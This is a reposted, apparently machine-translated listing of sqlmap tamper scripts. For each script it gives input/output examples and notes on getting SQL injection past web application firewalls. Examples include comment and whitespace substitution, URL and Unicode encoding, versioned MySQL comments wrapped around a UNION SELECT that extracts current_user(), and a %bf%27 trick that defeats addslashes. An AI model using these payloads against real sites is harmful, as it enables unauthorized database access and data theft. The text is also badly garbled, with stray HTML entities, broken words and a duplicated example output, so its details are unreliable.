Sqlmap's tampering bypasses WAF

space2comment.py

Replaces space character (') with comments '/**/' example:* input:select ID from users* output:select/**/id/**/from/**/ userstested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0notes:* useful To bypass weak and bespoke Web application firewalls ——————————————————————————-charencode.pyurl encoding example:* Input: SELECT FIELD from%20table* Output:%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45tested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0notes:* useful to bypass VE RY Weak Web application firewalls that does noturl-decode the request before processing it through their ruleset* the Web SE RVer'll anyway pass the url-decoded version behind,hence it should work against any DBMS ————————————————————————————— cha runicodeencode.py string Unicode encoding example:* input:select field%20from table* Output:%u0053%u0045%u004c%u0045%u0043% u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′requirement:* asp* ASP. nettested against:* Microsoft SQL Server 2000* Microsoft SQL Server 2005* MySQL 5.1.56* PostgreSQL 9.0.3notes:* useful to Bypass weak web application firewalls that does Notunicode url-decode the request before processing it through theirruleset- ————————————————— space2hash.py space is replaced with a # random string and a newline character replaces space character (') with a pound character (' # ') followed Bya Random string and a new line (' \ n ') example:* input:1 and 9227=9227* output:1%23pttmjopxdwj%0aand%23cwfcvrpv%0a9227=9227r equirement:* mysqltested against:* MySQL 4.0, 5.0 ——————————————— –space2morehash.py spaces replaced with #号 and more random string line breaks replaces space Character (') with a pound character (' # ') followed Bya random string and a new line (' \ n ') example:* input:1 and 9227=9 227* output:1%23pttmjopxdwj%0aand%23cwfcvrpv%0a9227=9227requirement:* mysql >= 5.1.13Tested against:* MySQL 5.1.41 —————————————— space2mssqlblank.py (MSSQL) space is replaced with a different empty symbol example:* Input:select ID from users* output:select%08id%02from%0fusersrequirement:* Microsoft SQL servertested against:* Microsoft SQL Server 2000* Microsoft SQL Server 2005# ASCII table:#   SOH          start of heading#   ST X     Geneva      start of text#   ETX     text#      end of ( ) EOT          end of transmission#   ENQ          enquiry# &NB Sp ACK          acknowledge#   BEL          bell#   BS &nbs P    08      backspace#   TAB          horizontal tab#   LF & nbsp    0a      new line#   VT      0b      vertical tab#   FF      0c      new page#   CR      0d      carriage return #   SO      0e      shift out#   SI      0f      shift in —————— ——————————-space2mysqlblank.py space to replace other whitespace symbols (MySQL) replaces space character (") with a random blank character from Avalid se T of alternate charactersexample:* input:select ID from users* output:select%0bid%0bfrom%a0usersrequirement:* MySQLTest Ed against:* MySQL 5.1#   TAB          horizontal tab#   LF     &NBSP;0A & nbsp    new line#   FF      0c      new page#   CR      0d &NB Sp    carriage return#   VT      0b      vertical TAB       &NBSP ;(MySQL and Microsoft SQL Server only) #  –      A0      -                  (MySQL only) ———————————————————————————-chardoubleencode.py dual URL encoding (not processed for encoding) Example :* Input:select FIELD from%20table* Output:%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d% 2520%2554%2541%2542%254c%2545 ——————————————————————————— percentage.pyasp allows you to add a% adds a percentage sign ('% ') before each character Infront of each characterexample:* input:select FIELD from table* Output:%s%e%l%e%c%t%f%i%e%l%d%f%r%o%m%t%a%b%l%erequ irement:* asptested against:* Microsoft sql Server, 2005* MySQL 5.1.56, 5.5.11* PostgreSQL 9.0 ———————————————————— ran domcase.py replaces keyword character with random case valueexample:* input:insert* output:inserttested agains t:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0 ————————————————— RANDOMCOMMENTS.P Y split the SQL keyword with/**/add random comments to SQL Keywordsexample: ' INSERT ' becomes ' In/**/s/**/ert ' ————————————————————- versionedmorekeywords.py comment Bypass encloses each keyword with versioned MySQL commentexample:* input:1 UNION all SELECT NULL, N ULL, CONCAT (CHAR (58,122,114,115,58), Ifnull (CAST (CURRent_user () as Char), char (+)), char (58,115,114,121,58)) #* output:1/*! union*//*! all*//*! select*//*! null*/,/*! null*/,/*! concat*/(/*! char*/(58,122,114,115,58),/*! ifnull*/(CAST (/*! current_user*/()/*!as*//*! char*/),/*! char*/(32)),/*! char*/(58,115,114,121,58)) #Requirement:* MySQL >= 5.1.13 ———————————————————————— versionedkeywords.pyencloses Each non-function keyword with versioned MySQL commentexample:* input:1 UNION all SELECT null, NULL, CONCAT (CHAR (58,104,1 16,116,58), Ifnull (CAST (Current_User () as Char), char (+)), char (58,100,114,117,58)) #* output:1/*! union*//*! all*//*! select*//*! null*/,/*! null*/, CONCAT (CHAR (58,104,116,116,58), Ifnull (CAST (Current_User ()/*!as*//*! char*/), char (+)), char (58,100,114,117,58)) #Requirement:* MySQL ———————————————————————-unmagicquotes.py wide character bypass GPC  addslashesreplaces quote character (') with a multi-byte combo%bf%27 together withgeneric comment at the end (to Ma Ke it work) example:* Input:1′and 1=1* output:1%bf%27 and 1=1–%20notes:* useful for bypassing magic_quotes/addslashes feature —————————————————————————— –equaltolike.pylike instead of equals example:* input:select * from Users where Id=1* Output:select * from the users where id like 1Tested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5 —————————————————————————-keyword before comment halfversionedmorekeywords.pyexample:* input:value ' UNION all SELECT CONCAT (CHAR (58,107,112,113,58), Ifnull (CAST (Current_User () as Char), char (+)), char (58,97,110,121,58)), NULL, null# and ' qdwa ' = ' qdwa* output:value '/*!0union/*!0all/*!0select/*!0concat (/*!0char (58,107,112,113,58),/*!0IFNULL (CAST (/*!0CURRENT _user ()/*!0as/*!0char),/*!0char (+)),/*!0char (58,97,110,121,58)), NULL, Null#/*!0and ' qdwa ' = ' qdwarequirement:* MySQL < 5.1Tested against:* MySQL 4.0.18, 5.0.22 original address: http://www.myhack58.com/Article/html/3/7/2013/39321.htm

Sqlmap Tamper Bypass WAF